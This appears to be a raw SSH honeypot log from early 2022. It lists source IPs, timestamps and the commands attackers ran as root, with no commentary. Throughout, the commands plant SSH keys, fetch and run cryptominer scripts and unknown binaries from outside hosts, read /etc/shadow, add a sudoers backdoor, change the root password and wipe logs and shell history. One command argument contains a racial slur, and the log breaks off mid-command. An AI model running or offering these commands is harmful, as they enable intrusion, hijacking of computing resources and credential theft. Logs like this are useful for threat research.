AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ From 45.148.10.163 20-Jan-2022 01:56:53 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 45.148.10.163 20-Jan-2022 12:20:26 ssh2 root Exec pkill java; pkill Xorg; pkill x11vnc; pkill cnrig; pkill xmrig; pkill screen; pkill zmap; pkill brrr; pkill x86; pkill monero; pkill x86_64; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:alolera12345 | chpasswd pkill java pkill Xorg pkill x11vnc pkill cnrig pkill xmrig pkill screen pkill zmap pkill brrr pkill x86 pkill monero pkill x86_64 curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:alolera12345 | chpasswd From 45.148.10.163 20-Jan-2022 15:00:00 ssh2 root Exec pkill java; pkill Xorg; pkill x11vnc; pkill cnrig; pkill xmrig; pkill screen; pkill zmap; pkill brrr; pkill x86; pkill monero; pkill x86_64; curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA; echo root:alolera12345 | chpasswd pkill java pkill Xorg pkill x11vnc pkill cnrig pkill xmrig pkill screen pkill zmap pkill brrr pkill x86 pkill monero pkill x86_64 curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA echo root:alolera12345 | chpasswd From 147.182.196.61 20-Jan-2022 21:19:47 ssh2 root Exec sudo hive-passwd sjdgisidjgjisejirw4g; sudo pkill Xorg; sudo pkill x11vnc; sudo service shellinabox stop; cat /hive-config/rig.conf; hostname sudo hive-passwd sjdgisidjgjisejirw4g sudo pkill Xorg sudo pkill x11vnc sudo service shellinabox stop cat /hive-config/rig.conf hostname From 43.154.198.116 21-Jan-2022 03:46:11 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt;perl /tmp/dred.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt perl /tmp/dred.txt Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt;perl /tmp/dred.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt perl /tmp/dred.txt From 43.154.198.116 21-Jan-2022 03:46:12 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt;perl /tmp/dred.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred.txt -o /tmp/dred.txt perl /tmp/dred.txt From 159.89.164.146 21-Jan-2022 07:00:43 ssh2 root Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ Exec uname -s -v -n -r -m uname -s -v -n -r -m From 179.43.187.70 21-Jan-2022 11:39:28 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/1a9zxq/7ega.x86; cat 7ega.x86 > x86; chmod +x x86; chmod 777 *; ./x86 rooted.x86; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://179.43.187.99/1a9zxq/7ega.x86 cat 7ega.x86 > x86 chmod +x x86 chmod 777 * ./x86 rooted.x86 history -c From 179.43.187.70 21-Jan-2022 11:42:14 ssh2 root Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.187.99/cometome; cat cometome > rooted; chmod +x rooted; chmod 777 *; ./rooted; history -c cat /etc/issue cd /tmp || cd /var/run || cd /mnt || cd /root || cd / wget -q http://179.43.187.99/cometome cat cometome > rooted chmod +x rooted chmod 777 * ./rooted history -c From 52.83.131.72 23-Jan-2022 02:47:55 ssh2 root Exec uname -a ; lscpu uname -a lscpu Exec uname -a ; lscpu uname -a lscpu From 50.212.157.1 23-Jan-2022 14:25:02 ssh2 root w lscpu From 137.117.73.142 24-Jan-2022 12:34:02 ssh2 root Exec uname -a;nproc uname -a nproc From 159.89.155.205 25-Jan-2022 00:15:31 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec unset HISTFILE ; unset HISTSIZE unset HISTFILE unset HISTSIZE From 193.112.9.233 25-Jan-2022 02:22:34 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ From 35.235.78.51 25-Jan-2022 02:31:54 ssh2 root Exec cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ cd ~ rm -rf .ssh mkdir .ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys chmod -R go= ~/.ssh cd ~ Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 107.189.31.191 25-Jan-2022 07:48:16 ssh2 root Exec uname -a uname -a Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 78.5.68.102 25-Jan-2022 11:52:04 ssh2 root Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" Exec cat /proc/cpuinfo | grep name | wc -l cat /proc/cpuinfo | grep name | wc -l From 35.235.78.51 25-Jan-2022 12:43:30 ssh2 root Exec uname -a; cd /tmp ;curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN uname -a cd /tmp curl -s -L http://222.100.89.36/stx.sh | LC_ALL=en_US.UTF-8 bash -s 49G2LmJhnRZMLGQvYE8d8ACxtgfTaxBpgUCY6sT8cNTWBeBZUkfMnnJULG1x12tLxQ3VDVmL2hxJVAHBVA5TVrcTQ8N1KRN Exec echo -e "\x6F\x6B" echo -e "\x6F\x6B" From 69.176.89.80 26-Jan-2022 11:48:16 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt;perl /tmp/dred2.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt perl /tmp/dred2.txt From 189.242.159.177 27-Jan-2022 02:22:17 ssh2 root Exec echo -n NZAWCH8S|md5sum echo -n NZAWCH8S|md5sum From 173.249.11.42 28-Jan-2022 12:18:15 ssh2 root Exec uname -s -v -n -r uname -s -v -n -r Exec uname -s -v -n -r uname -s -v -n -r Exec uname -s -v -n -r uname -s -v -n -r From 173.249.11.42 28-Jan-2022 12:26:58 ssh2 root Exec uname -s -v -n -r uname -s -v -n -r Exec uname -s -v -n -r uname -s -v -n -r From 173.249.11.42 28-Jan-2022 12:28:18 ssh2 root Exec uname -s -v -n -r uname -s -v -n -r From 209.141.48.248 29-Jan-2022 17:08:32 ssh2 root Exec cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /;rm -rf a.sh; wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh; chmod 777 a.sh; nohup ./a.sh & cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd / rm -rf a.sh wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh chmod 777 a.sh nohup ./a.sh From 209.141.48.248 29-Jan-2022 17:08:33 ssh2 root Exec cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /;rm -rf a.sh; wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh; chmod 777 a.sh; nohup ./a.sh & cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd / rm -rf a.sh wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh chmod 777 a.sh nohup ./a.sh Exec cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd /;rm -rf a.sh; wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh; chmod 777 a.sh; nohup ./a.sh & cd /tmp || cd /var/run || cd /var/run || cd /mnt || cd /root || cd / rm -rf a.sh wget -O a.sh http://107.189.12.110/a.sh || curl -o a.sh http://107.189.12.110/a.sh chmod 777 a.sh nohup ./a.sh From 193.169.252.71 31-Jan-2022 22:58:51 ssh2 root Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 rm -rf /var/log/wtmp rm -rf /var/log/lastlog rm -rf /var/log/secure rm -rf /var/log/xferlog rm -rf /var/log/messages rm -rf /var/run/utmp touch /var/run/utmp touch /var/log/messages touch /var/log/wtmp touch /var/log/messages touch /var/log/xferlog touch /var/log/secure touch /var/log/lastlog rm -rf /var/log/maillog touch /var/log/maillog rm -rf /root/.bash_history touch /root/.bash_history history -r From 193.169.252.71 31-Jan-2022 23:46:21 ssh2 root Exec unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH ; history -n ; export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ; rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH history -n export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 rm -rf /var/log/wtmp rm -rf /var/log/lastlog rm -rf /var/log/secure rm -rf /var/log/xferlog rm -rf /var/log/messages rm -rf /var/run/utmp touch /var/run/utmp touch /var/log/messages touch /var/log/wtmp touch /var/log/messages touch /var/log/xferlog touch /var/log/secure touch /var/log/lastlog rm -rf /var/log/maillog touch /var/log/maillog rm -rf /root/.bash_history touch /root/.bash_history history -r From 49.232.131.73 1-Feb-2022 21:17:03 ssh2 root Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig Exec echo > /var/tmp/ifconfig; chmod 777 /var/tmp/ifconfig; cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig echo > /var/tmp/ifconfig chmod 777 /var/tmp/ifconfig cat > /var/tmp/ifconfig From 103.145.148.138 1-Feb-2022 21:17:40 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 From 209.97.182.205 1-Feb-2022 21:18:16 ssh2 root Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig From 209.97.182.205 1-Feb-2022 21:18:16 ssh2 root echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 1.220.98.197 1-Feb-2022 21:18:57 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /etc/ifconfig; chmod 777 /etc/ifconfig; cat > /etc/ifconfig echo > /etc/ifconfig chmod 777 /etc/ifconfig cat > /etc/ifconfig From 58.247.202.150 1-Feb-2022 21:39:24 ssh2 root Exec echo > ./ifconfig; chmod 777 ./ifconfig; cat > ./ifconfig echo > ./ifconfig chmod 777 ./ifconfig cat > ./ifconfig Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 80.147.162.151 1-Feb-2022 22:21:19 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /dev/shm/ifconfig; chmod 777 /dev/shm/ifconfig; cat > /dev/shm/ifconfig PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 echo > /dev/shm/ifconfig chmod 777 /dev/shm/ifconfig cat > /dev/shm/ifconfig From 123.207.26.100 1-Feb-2022 22:36:55 ssh2 root Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 PATH=/dev/shm/:/tmp/:./:/var/tmp/:/root/:/etc/:$PATH nc localhost 1234 Exec echo > /root/ifconfig; chmod 777 /root/ifconfig; cat > /root/ifconfig echo > /root/ifconfig chmod 777 /root/ifconfig cat > /root/ifconfig Exec echo > /tmp/ifconfig; chmod 777 /tmp/ifconfig; cat > /tmp/ifconfig echo > /tmp/ifconfig chmod 777 /tmp/ifconfig cat > /tmp/ifconfig From 62.233.50.127 7-Feb-2022 05:29:07 ssh2 root Exec uname -a;cd /tmp;wget ftp://cpa:cpa@5.45.119.175/max.txt;perl max.txt;rm -rf max.*;history -c;clear uname -a cd /tmp wget ftp://cpa:cpa@5.45.119.175/max.txt perl max.txt rm -rf max.* history -c clear From 112.65.206.11 7-Feb-2022 09:27:40 ssh2 root Exec uname -a;id;cat /etc/shadow /etc/passwd;lscpu;chattr -ia /root/.ssh/*;wget http://mangocorner.com.sg/img/ns1.jpg -O ~/.ssh/authorized_keys;chmod 600 ~/.ssh/authorized_keys;wget -qO - http://mangocorner.com.sg/img/ns2.jpg|perl;wget http://mangocorner.com.sg/img/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;chown daemon.daemon /sbin/.ssh /sbin/.ssh/*;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers;chsh -s /bin/sh daemon uname -a id cat /etc/shadow /etc/passwd lscpu chattr -ia /root/.ssh/* wget http://mangocorner.com.sg/img/ns1.jpg -O ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys wget -qO - http://mangocorner.com.sg/img/ns2.jpg|perl wget http://mangocorner.com.sg/img/ns3.jpg -O /tmp/x chmod +x /tmp/x /tmp/x mv /tmp/x /tmp/o /tmp/o rm -f /tmp/o mkdir /sbin/.ssh cp ~/.ssh/authorized_keys /sbin/.ssh chown daemon.daemon /sbin/.ssh /sbin/.ssh/* chmod 700 /sbin/.ssh chmod 600 /sbin/.ssh/authorized_keys echo 'daemon ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers chsh -s /bin/sh daemon From 51.15.11.198 7-Feb-2022 23:55:35 ssh2 root Exec unset HISTFILE ; unset HISTSIZE unset HISTFILE unset HISTSIZE From 194.163.167.5 11-Feb-2022 19:48:26 ssh2 root Exec cd /tmp/; wget 179.43.175.83/x86_64; chmod 777 x86_64; ./x86_64 x86xhed cd /tmp/ wget 179.43.175.83/x86_64 chmod 777 x86_64 ./x86_64 x86xhed From 93.95.230.96 12-Feb-2022 09:49:31 ssh2 root Exec nproc nproc From 179.43.170.173 12-Feb-2022 16:12:23 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 492cUvVMbMsKpWGoSkTSbzix9Pk2Ho6XUid9vRSFALXjfQS76gyNGjnTh6DTpPHwnBAHDztwbWUGiCfZgkbndYtAMuekPcA From 141.98.10.175 12-Feb-2022 22:00:52 ssh2 root Exec wget 209.141.33.122/x86; chmod 777 x86; ./x86 nigga wget 209.141.33.122/x86 chmod 777 x86 ./x86 nigga From 179.43.159.3 13-Feb-2022 05:18:17 ssh2 root Exec curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47yfXMczghs86YWRp1GQ8rR3mKJMGFnCbcPcbGq484JPfWyuYv5q7rHBzkC1LWtbXnLrKCyqDhqqj6DW4MBp92qtTxcwHk6 curl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 47yfXMczghs86YWRp1GQ8rR3mKJMGFnCbcPcbGq484JPfWyuYv5q7rHBzkC1LWtbXnLrKCyqDhqqj6DW4MBp92qtTxcwHk6 From 141.98.10.175 14-Feb-2022 09:01:13 ssh2 root Exec wget 209.141.33.122/x86; chmod 777 x86; ./x86 nigga wget 209.141.33.122/x86 chmod 777 x86 ./x86 nigga From 69.49.224.103 15-Feb-2022 08:46:53 ssh2 root Exec uname -a;lspci | grep -i --color 'vga\|3d\|2d';curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt;perl /tmp/dred2.txt uname -a lspci | grep -i --color 'vga\|3d\|2d' curl -s -L http://130.0.164.120/dred2.txt -o /tmp/dred2.txt perl /tmp/dred2.txt From 179.43.139.10 15-Feb-2022 11:58:13 ssh2 root Exec cd /tmp/; wget 